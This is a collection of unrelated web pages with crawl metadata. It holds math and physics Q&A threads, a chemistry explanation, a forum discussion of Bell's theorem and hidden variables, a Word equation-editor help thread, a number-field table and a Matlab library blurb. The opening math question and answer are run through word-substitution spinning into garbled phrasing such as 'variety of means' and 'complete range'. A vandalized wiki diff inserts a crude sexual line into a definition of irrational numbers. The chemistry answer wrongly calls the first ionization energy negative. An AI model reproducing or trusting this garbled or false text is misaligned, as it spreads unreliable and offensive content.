To pick any kind of 2 factors in the mesh there are $\left(n^r \left(n^r - 1\right)\right)/2$ means of doing this.
So if we pick 2 factors in the mesh $p\lbrace 1, 2, ..., r \rbrace$ and also $q\lbrace 1, 2, ..., r \rbrace$ The range is computed as the Manhattan Distance
$\sum_{i=1}^{r} \left| {q_i - p_i} \right|$
Now i need to locate the complete range in between all nodes and also separate that by the the variety of means of picking 2 nodes (offered over).
I recognize just how to do this by considering this 3 - dimensional instance which needs to work with the r - dimensional instance additionally yet i am having problem sharing it in some type of amount notation.
Below is just how i assume i can get the complete range in between all nodes, i wish this is clear.
In this 3 - d mesh allow is think the nodes are classified $\left( 1, 1, 1 \right)$ to $\left( 3, 3, 3\right)$. Allows start at $\left( 1, 1, 1 \right)$ and also summarize the range in between this node and also all various other nodes. After that we relocate to $\left( 1, 1, 2 \right)$ and also summarize the ranges in between this node and also all various other nodes with the exception of $\left( 1, 1, 1 \right)$ due to the fact that we have actually currently counted the range in between $\left( 1, 1, 1 \right)$ and also $\left( 1, 1, 2 \right)$. After that we relocate onto $\left( 1, 1, 3 \right)$ and also summarize all with the exception of $\left( 1, 1, 1 \right)$ and also $\left( 1, 1, 2 \right)$. We proceed this till we permute via in order $\left( 1, 1, 1 \right)$, $\left( 1, 1, 2 \right)$, $\left( 1, 1, 3 \right)$, $\left( 1, 2, 1 \right)$, $\left( 1, 2, 2 \right)$, ect ... Does that make good sense?
That need to offer me the complete range without counting anything two times. After that i separate that by the variety of means of picking 2 nodes and also i will certainly have the ordinary range. Does this audio proper to you? Any kind of aid would certainly be valued.
0
2019-05-18 22:11:50
Source Share
This strategy is proper, yet extra job than called for. Making use of the taxicab statistics each measurement is independent. Taking a dice of side n you can count the upright sectors made use of as adheres to: from the lower layer to the next layer up, we count $n^2$ (factors under layer) times $n^2*(n-1)$ (factors over the lower layer) = $n^4*(n-1)$. For the next layer you have $2*n^2*n^2*(n-2)$ and more. The $n^4$s disperse out and also you can simply think of the complete range along a line of size n. This is $\sum_{i=1}^{i=n}i*(n-i)$. After that increase by $n^4$ and also you have the complete use in the upright instructions. After that increase by 3 for the complete use in each instructions. And also divide by the variety of sets of factors, which you have actually computed currently. The expansion to various variety of measurements or non - cubical meshes need to be clear. | 2021-11-27 21:10:08 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5925427675247192, "perplexity": 503.0308539088105}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964358233.7/warc/CC-MAIN-20211127193525-20211127223525-00514.warc.gz"} |
https://socratic.org/questions/5831ace67c01494c8f7b7a3c | # What is the difference between ground state electron configurations and otherwise?
Nov 26, 2016
You can treat the ground-state electron configuration as basically a point of reference that is (at the moment) lowest in energy.
You could go in three directions from the ground-state:
• Ionization by removal of an electron (forming ${\text{B}}^{+}$)
• Ionization by addition of an electron (forming ${\text{B}}^{-}$)
• Promotion of an electron to a higher energy level (forming $\text{B"^"*}$)
Let's take boron as a normal example. Boron's ground-state configuration is $\textcolor{b l u e}{1 {s}^{2} 2 {s}^{2} 2 {p}^{1}}$.
$\underline{\uparrow \textcolor{w h i t e}{\downarrow}} \text{ " ul(color(white)(uarr darr))" } \underline{\textcolor{w h i t e}{\uparrow \downarrow}}$
$\stackrel{}{\underbrace{\text{ "" "" "" "" "" "" "" }}}$
$\text{ "" "" } 2 p$
$\underline{\uparrow \downarrow}$
$2 s$
$\underline{\uparrow \downarrow}$
$1 s$
(1) Removal of an electron
If an electron is removed, it corresponds to an ionization energy; energy is required to remove an electron from boron, so ${\text{IE}}_{1}$ is negative.
The new electron configuration, for ${\text{B}}^{+}$, is $\textcolor{b l u e}{1 {s}^{2} 2 {s}^{2} \textcolor{red}{2 {p}^{0}}}$ (the $2 {p}^{0}$ is to emphasize the absence of that electron).
$\underline{\cancel{\textcolor{red}{\uparrow}} \textcolor{w h i t e}{\downarrow}} \text{ " ul(color(white)(uarr darr))" } \underline{\textcolor{w h i t e}{\uparrow \downarrow}}$
$\stackrel{}{\underbrace{\text{ "" "" "" "" "" "" "" }}}$
$\text{ "" "" } 2 p$
$\underline{\uparrow \downarrow}$
$2 s$
$\underline{\uparrow \downarrow}$
$1 s$
(2) Addition of an electron
If an electron is added, it corresponds to an electron affinity. Electron affinity basically describes what happens to the energy of the atom when you add an electron to it.
That is, if ${\text{EA}}_{1} > 0$, then you destabilize the atom (which is why electron affinities for noble gases are positive). For boron, it is $- \text{27.0 kJ/mol}$, so boron is slightly stabilized when it gains one electron.
The new electron configuration, of ${\text{B}}^{-}$, is then $\textcolor{b l u e}{1 {s}^{2} 2 {s}^{2} \textcolor{red}{2 {p}^{2}}}$.
$\underline{\uparrow \textcolor{w h i t e}{\downarrow}} \text{ " ul(color(blue)(uarr) color(white)(darr))" } \underline{\textcolor{w h i t e}{\uparrow \downarrow}}$
$\stackrel{}{\underbrace{\text{ "" "" "" "" "" "" "" }}}$
$\text{ "" "" } 2 p$
$\underline{\uparrow \downarrow}$
$2 s$
$\underline{\uparrow \downarrow}$
$1 s$
(3) Promotion of electron to higher energy level
You can do this by shooting, say, the right wavelength of laser at a sample of boron, and some of the sample will get excited, giving the electron exactly the right energy to get promoted to a higher energy level.
A valid new energy level for boron is the $3 s$ orbital:
$\underline{\textcolor{b l u e}{\uparrow} \textcolor{w h i t e}{\downarrow}}$
$3 s$
$\underline{\cancel{\textcolor{red}{\uparrow}} \textcolor{w h i t e}{\downarrow}} \text{ " ul(color(white)(uarr darr))" } \underline{\textcolor{w h i t e}{\uparrow \downarrow}}$
$\stackrel{}{\underbrace{\text{ "" "" "" "" "" "" "" }}}$
$\text{ "" "" } 2 p$
$\underline{\uparrow \downarrow}$
$2 s$
$\underline{\uparrow \downarrow}$
$1 s$
That would be known as an electronic excitation. That changes the electron configuration to the one for $\text{B"^"*}$:
$\textcolor{b l u e}{1 {s}^{2} 2 {s}^{2} 2 {p}^{0} \textcolor{red}{3 {s}^{1}}}$
The $2 p$ subshell becomes empty because the only electron in it was excited up to the $3 s$ orbital.
(This is an unstable state, so soon after it forms, the electron will fall back down to the original $2 p$ orbital and we'll see the ground state again, $1 {s}^{2} 2 {s}^{2} 2 {p}^{1}$.) | 2020-12-04 11:12:55 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 49, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6853888630867004, "perplexity": 780.333219710563}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-50/segments/1606141735600.89/warc/CC-MAIN-20201204101314-20201204131314-00635.warc.gz"} |
https://nigerianscholars.com/past-questions/physics/question/288175/ | Home » » I. Density of the liquid.II. Depth below the surface of the liquid. III. Surface...
# I. Density of the liquid.II. Depth below the surface of the liquid. III. Surface...
### Question
I. Density of the liquid.
II. Depth below the surface of the liquid.
III. Surface area of the liquid.
In which of the statement above will pressure be dependent?
### Options
A)
I and II only.
B)
II and III only.
C)
I, II and III only.
D)
I and III only.
### Explanation:
Pressure in liquid is independent of cross sectional area of the container/ liquid
∴ the correct options are I & II
## Dicussion (1)
• Pressure in liquid is independent of cross sectional area of the container/ liquid
∴ the correct options are I & II | 2022-05-23 02:48:42 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8161695599555969, "perplexity": 2886.4830317445712}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662552994.41/warc/CC-MAIN-20220523011006-20220523041006-00684.warc.gz"} |
https://www.conservapedia.com/Special:MobileDiff/789234 | # Changes
An '''irrational number''' is a #REDIRECT [[real number]] that cannot be expressed as the ratio of two [[integers]]. Irrational numbers often arise as solutions to problems involving rational numbers. For example, the square root of 2 is irrational. Other irrationals, such as [[pi]], serve as fundamental constants in many mathematical problems. Irrational numbers can never be expressed exactly using decimal notation with a finite number of digits. Instead it is common to write them using only enough significant digits to solve the problem at hand, followed by an ellipsis (…): :$\pi\ = 3.1415926...$ ==See also== [[Transcendental numbers]] [[Category:mathematicsASSFLY JUST LOOVVVVVVVEEEEEEEEESSSSSSSS Z'S MASSIVE COCK]] | 2019-07-17 12:47:56 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9543747901916504, "perplexity": 638.671895614678}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195525187.9/warc/CC-MAIN-20190717121559-20190717143559-00045.warc.gz"} |
https://stats.stackexchange.com/questions/123265/monte-carlo-simulations-with-multiple-random-variables | # Monte-Carlo Simulations with multiple random variables
I have the following observation model : $y_i=x_i+a_i$, where $a_i$ is a Gaussian random variable whose mean is function of a uniform random variable $b_i$. I have designed, $\hat{x}_i$, an estimator of $x_i$ and would like to evaluate its performance using Monte-Carlo simulations. I use the following logic, which I appreciate if you can criticize:
For i=1:I
n=0
Generate an $x_i$ uniformly from a given distribution
for j=1:J
Generate $b_j$ as a r.v. from a given uniform distribution
for k=1:K
Generate $a_jk$ as a normal r.v. conditional to $b_j$
Generate synthetic data: $y_jk=x_i+a_jk$
Obtain $\hat{x}_n$ using $y_jk$
n++
end
end
find $\hat{x}_i$ as the average of $\hat{x}_n$
end
calculate the RMS of error.
Note that the distributions of $a$ and $b$ can be anything. However, I don't have access to the joint PDF's. Instead I have the following:
• The distribution of $x$
• The distribution of $b$
• The distribution of $a|b$
• Your model description is incomplete: how are x, a, and b related in a joint probabilistic model? If there are repeated measures, how are they connected with the variables? Introduce double or triple indices in the first equation. Without this description, the three levels of loops in your pseudo-code are delicate to justify or criticise. – Xi'an Nov 9 '14 at 11:41
• have edited my description. I hope it's clearer now. – Pioneer83 Nov 9 '14 at 21:22
• Thanks. In that case, do you want to check the error conditional on $X=x_i$? Otherwise, I would use a single loop, instead of three. The RMSE should be the average of the $(\hat{x}_i-x_i)^2$ so why compute an average of $\hat{x}_i$'s? – Xi'an Nov 9 '14 at 21:29
• Well, to avoid outliers effect, one should have a loop for each random variable (my understanding). So, I have a loop t to pick $x_i$ then generate differtent $a_i$'s in an inner loop. But because the distirbution of $a_i$ dependes on $b_i$ I added middle loop to generate $b$'s. – Pioneer83 Nov 9 '14 at 21:57
• Once again, I see no reason to have more than a single loop. If there is a possibility of outliers in your simulation, it should be either barred from the simulating mechanism or else incorporated in the model, because otherwise the Monte Carlo results cannot be trusted. – Xi'an Nov 10 '14 at 19:35 | 2019-09-15 14:31:51 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7085480690002441, "perplexity": 544.3186190328246}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514571506.61/warc/CC-MAIN-20190915134729-20190915160729-00344.warc.gz"} |
https://www.physicsforums.com/threads/typing-equations-in-microsoft-word-2007.220267/ | # Typing equations in Microsoft Word 2007
1. Mar 6, 2008
### mbrmbrg
Does anyone know how to use the equations editor in microsoft word 2007?
When I go the insert tab, I can insert symbols, but the equations option is grayed out. I do NOT have the patience to sit there finicking with formatting, etc. just to see
$$Ax^2+Bx+C=0$$
$$x=\frac{-B\pm\sqrt{B^2-4AC}}{2A}$$
or something even harder to format (like an equation involving total differential or something).
Any ideas?
2. Mar 6, 2008
### Staff: Mentor
If the equations option in the drop down menu is not available, then that option was not installed. If you have the Office 2007 CD (or Word) then one should be able to install it.
Otherwise one can use super and subscripts in the set of Commands on the Customize toolbar > Format > supercript or supscript. That can enable one to do simple polynomials, exponents and indices. Otherwise one needs to intall the equation or use a TeX (Latex) editor.
3. Mar 6, 2008
### mbrmbrg
Aaack!
OK, that's it. I'll talk to the head of the physics department and ask him to kindly get equations installed. Manual formatting (especially when the program loves to automatically format everything) is not my cup of tea.
Then again... I really like LaTeX. Do you know how to install a TeX editor?
4. Mar 6, 2008
5. Mar 6, 2008
Right-o.
Thanks!
6. Apr 7, 2008
### shouga
How can I calculate the avreage in Microsoft Word 2007,,
and is the equation tools only for the apperance or it can calculate!!
7. Jan 6, 2011
### Mirakelman
Also, if the file you're working on is saved as .doc the button will be grayed out aswell.
I'm digging up this thread because it's one of the first results google gave me when I searched for this anomaly.
8. Jul 18, 2012
### darussiaman
Yes! That's exactly the issue I came up against. What can be done about the fact that it's grayed out? Anything? Yes, I do have it installed because I can use the equation editor thing on .docx documents.
Ditto.
9. Jul 18, 2012
### Mirakelman
Just save the document as .docx.
10. Jul 18, 2012
### bobm
Also, the "old" equation editor (aka Microsoft Equation 3.0) is still in Word 2007/2008/2010/2011, and it can be used in either .doc documents or .docx documents. To get to it in Word 2007, in the Text group of the Insert tab, click on Object. From there, it's similar to previous versions of Word. (Look for Microsoft Equation in the list of "Objects".) | 2017-02-26 08:07:33 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5019952654838562, "perplexity": 3354.6639176087797}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00335-ip-10-171-10-108.ec2.internal.warc.gz"} |
https://www.physicsforums.com/threads/local-hidden-variable-model-that-equals-qm-predictions.921985/ | # B Local Hidden Variable Model That Equals QM Predictions?
1. Aug 5, 2017
### morrobay
With E a,b = ( dλ ( a,a' b,b' λ) Suppose λ depends independently/locally on detector setting choices at A and B.
For example suppose there are 360 detector settings at A and 360 at B , corresponding to 360 particle/detector interactions/outcomes at A = ± 1 and also at B = ± 1. Then as θ = β-α there are 3602 possible thetas.
If these thetas when applied to: P++ = P-- = 1/2 (sin θ/2)2 and to P-+ = P+- = 1/2/(cos θ/2)2
are in agreement with QM predictions: Bell inequality violations
( that of course include the 360 cases when α = β , sin 0 = 0 , cos 0 = 1)
Then could a computer simulation for the 3602 θ's verify if this local,deterministic hidden variable model fits the facts ?
2. Aug 5, 2017
### Staff: Mentor
Bell's theorem shows that it is mathematically impossible for a model of the type you describe to match the QM predictions for all possible combinations of angles for A and B. Such a model can match QM predictions for some combinations, but not all combinations. So no such model can fit the facts.
3. Aug 6, 2017
### entropy1
You seem to assume knowledge of θ. I am not sure if that is local.
Last edited: Aug 6, 2017
4. Aug 7, 2017
### Zafa Pi
I believe that both @PeterDonis and @entropy1 are correct, but the latter is more directly germane to your proposal. Alice & Bob are far apart (not local) when setting their angles and neither knows what the other's setting is. So how does one know which of your 3602 to select? If A & B are close and can communicate then all bets are off, i.e. they can make any correlations they want.
5. Aug 7, 2017
### morrobay
All the 3602 possible thetas are applied for computing all the possible outcomes of the model to see if it equals QM predictions.
As well as recorded experimental outcomes. E (a.b) = ∫ dλ C (a a' b b' λ)
Model outcomes only depend on settings at space like separated A and B and λ (particle properties)
For photons all the thetas are applied to E (a,b,) = cos2 θ - sin2 θ
S = E ( ab ) - E(ab') + E (a'b) + E (a'b')
Shv ≤2 SQM = 2√2
For spin 1/2 particles all the thetas are applied to the cos2 and sin2 formulas to produce model curve for comparisons to this graph.
Or could be applied to any inequality of this sort: N(a+b-) + N(b+c-) ≥ N(a-c+)
So knowledge about theta (β-α) is not applicable for the model testing QM predictions. Only a computer simulation for all thetas..
Last edited: Aug 7, 2017
6. Aug 8, 2017
### DrChinese
The thing is, as PeterDonis mentioned, this is exactly what has been looked at many times before. Bell's Theorem precludes this from working. You only need to check it for 3 pairs of angles to see the problem:
0/120 degrees
120/240 degrees
0/240 degrees
Try hand inserting actual values for these 3 angles 0/120/240 for a series of trials (it is easier if you work with the correlated case rather than the anti-correlated case). These cannot have pairwise values that match (or mismatch depending on setup) less than 1/3 (unless you know in advance which pair you are going to choose). QM predicts 1/4. This more or less corresponds to the graph you provided for the 30 degrees and 60 degrees cases.
When you hand insert values - that's so you can cherry pick to try and make it work out - you realize quickly that you can only make things work out if you cheat. I.e.you know which pair of angles you are selecting in advance. And if you cheat like that, you can make any formula work out. Even the QM prediction.
7. Aug 8, 2017
### Zafa Pi
@morrobay, are you proposing a way to violate a Bell inequality without using entangled particles?
8. Aug 8, 2017
### morrobay
Not at all. This is a train of thought continued from the Entangled Particles thread, page 1. See my post #32. Item 2. Correlations encoded during preparation of entanglement.
9. Aug 8, 2017
### Zafa Pi
Are you trying to give an explanation for the correlations that infect entangled particles? Why do you need a 360 by 360 table as @DrChinese pointed out a 3 by 3 should suffice? If you want a classical explanation, how about dBB or ER = EPR?
I don't know why I'm saying all this since I really don't understand what you're trying to do.
10. Aug 9, 2017
### entropy1
What is the matter about Item 2, @morrobay ?
11. Aug 9, 2017
### Zafa Pi
Hidden variables = item 2, for what its worth.
12. Aug 10, 2017
### morrobay
If you scroll down in the paper to page 5/13 (on printout) to :
A plot of the simple linear correlation profile and the qm profile is shown below.
PLOT
These profiles agree only for measurements differing by 0, π/2 and π. For all other cases the simple pre-programmed linear model fails to match the qm predictions,
( sin(θ/2)2 and cos(θ/2)2 formulas. ) That is understood.
Now the following is exactly what my question in this topic is:
" This raises the interesting question of whether any pre programmed response profile can reproduce the predictions of qm (and the experimental results)
Suppose each particle is programmed with a more complicated profile of responses as a function of the measurement angle"
This would incorporate the 3602 thetas in my proposal.
The paper then continues to show why this clearly ruled out.
I notice that you Zafa Pi have a math background. Perhaps you could elaborate on why this model is ruled out. thank you.
http://www.mathpages.com/home/kmath521/kmath521.htm
13. Aug 10, 2017
### Jilang
My understanding is that all probabilities must add to one and none can be negative. If you allow the negative ones however...
14. Aug 10, 2017
### DrChinese
If you can see it is ruled out (much as Bell first showed us), what more is there?
As to the 360^2: the 3 angles I provided (0, 120, 240 degrees) should ALSO be enough to demonstrate why your idea doesn't work. Just write out a sequence of those - say 10. You will see that no matter what values you provide, the average will be at least 1/3. The quantum mechanical prediction is 1/4. It works the same way on most any 3 angles, but the important point is that experiment rules out your idea (unless there is superluminal signalling).
And my 3 angles are way easier to calculate than yours - by a factor of more than 10,000,000. Just sayin'...
15. Aug 10, 2017
### Zafa Pi
Neither A or B knows what angle the other measured, and they are far apart. How do your preprogramed entities know what values to deliver from your table? Are you proposing they somehow know what A and B did and thus immediately give the appropriate responses to match those of the entangled photons?
16. Aug 10, 2017
### cube137
just a simple inquiry.. I know there are non-local hidden variables.. but are there non-deterministic hidden variables too or are all hidden variables deterministic?
if there are nondeterministic-non local hidden variables.. how does this differ to Copenhagen then?
17. Aug 11, 2017
### Zafa Pi
@morrobay, You can find the clarification in Bell's original paper.
I'm having computer problems with this site, so I'm quitting for a while.
18. Aug 11, 2017
### morrobay
10 through 3600 measurement outcomes are recorded at both A and B. Then all 3602 thetas
can be produced for comparing experimental and calculated results.. The question now is not on experimental setup
but rather a section in this paper ; http://www.mathpages.com/home/kmath521/kmath521.htm
( Scroll down to the first plot shown of simple linear correlation profile and QM profile.Then in the paragraph below the plot start here:
" Suppose each particle is programmed with a more complicated profile of responses as a function of the measurement angle"
Can you elaborate on the math shown that rules out such a particle being in agreement with QM
predictions in relation to the Bell inequality ?
Last edited: Aug 11, 2017
19. Aug 11, 2017
### Staff: Mentor
What sort of elaboration are you looking for? If you could tell us which part is not clear and needs further explanation, we may be able to help.
20. Aug 11, 2017
### morrobay
Before referencing the math in question I want to restate/update. The original idea was that there could be pre programmed and fixed responses for entangled particles all 3600 settings such that outcomes at any combination of angles at spacelike A and B could agree with QM predictions and therefore violate the inequality. Ie the long distance non classical correlations are encoded during entanglement preparation. So there are 3602 possible thetas.
Now there is a sidetrack question: If as said above,360 measurement outcomes are recorded at A and 360 at B . Not at parallel settings but random so that each A and B have outcomes from stream of identically prepared entangled particles for 360 settings. . Is it valid to combine them all to make up the 3602 thetas. β-α
In other words is it valid for this particular model to combine an outcome at setting at A , 800 from one pair. And then from another pair an outcome at B , at 3330 . To say this way: in this model could the results from two different pairs, A at 800 and B at 3330 be equal to outcomes for one pair measured at A, 800 and B 3330 ? If this is invalid then all 3602 measurements could be made.
Now the math in question: (4) The integral that = - cos(θ).
If this equals the QM prediction for the correlation from the said pre pro grammed particle then why is it ruled out in the following paragraph:
"This is because the increase in correlation is proportional to the increase in θ arising from the transition at α = π - θ
Last edited: Aug 11, 2017
21. Aug 11, 2017
### Staff: Mentor
And that is not possible. Bells theorem basically says that if the results are encoded during preparation, then the correlations must obey the inequality. And as @DrChinese has repeatedly pointed out, you should try finding an encoding that leads to a violation of the inequality for just three angles ($0$,$2\pi/3$, $4\pi/3$); you won't be able to.
You can do that, but the resulting table will not have the property that when the two angles are the same, the results of the two measurement are never the same. Thus, it fails to match observation even before we consider any inequalities.
22. Aug 11, 2017
### entropy1
@morrobay Perhaps you mean to form a table for A and B out of actual experimental data. You have to keep in mind then that the prefabricated data for A and B is local. The orientation of the detectors may be changed while the pair of particles is already produced (and the HV with them). In that case, if A=0°, then we have a set of 360 outcomes for possible angles for B. But if we, say, choose 10° for A, we have the same 360 possible outcomes for B! A and B are separated, and will not agree to QM outcomes.
Last edited: Aug 11, 2017 | 2018-07-20 11:34:21 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7063873410224915, "perplexity": 1367.7222220858944}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676591578.1/warc/CC-MAIN-20180720100114-20180720120114-00482.warc.gz"} |
https://plainmath.net/19719/let-be-the-relation-from-equal-to-equal-defined-by-xry-if-and-only-if-equal | Question
# Let R be the relation from X={1,2,3,5} to Y={0,3,4,9} defined by xRy if and only if x^2=y
Discrete math
Let R be the relation from X={1,2,3,5} to Y={0,3,4,9} defined by xRy if and only if $$\displaystyle{x}^{{2}}={y}$$ | 2021-09-18 08:02:04 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9396060109138489, "perplexity": 993.5775181069017}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780056348.59/warc/CC-MAIN-20210918062845-20210918092845-00637.warc.gz"} |
http://www.lmfdb.org/LocalNumberField/?p=2&n=5 | Learn more about
Results (displaying both matches)
Polynomial $p$ $e$ $f$ $c$ Galois group Slope content
x5 + x2 + 1 2 1 5 0 $C_5$ (as 5T1) $[\ ]^{5}$
x5 - 2 2 5 1 4 $F_5$ (as 5T3) $[\ ]_{5}^{4}$
Download all search results for | 2019-10-16 22:06:45 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.35154807567596436, "perplexity": 2788.0531964688216}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986670928.29/warc/CC-MAIN-20191016213112-20191017000612-00065.warc.gz"} |
http://barog.net/projects/1_project/ | # SSLVQ: A self-supervised online multi-view learning vector quantization framework for object affordance learning.
SSLVQ is a Matlab library distributed to accompany the publication of my Ph.D. thesis and 2015 IJARS journal article and was developed in order to enable developmental learning of object affordance categories for autonomous robots.
Our object affordance learning scenario.
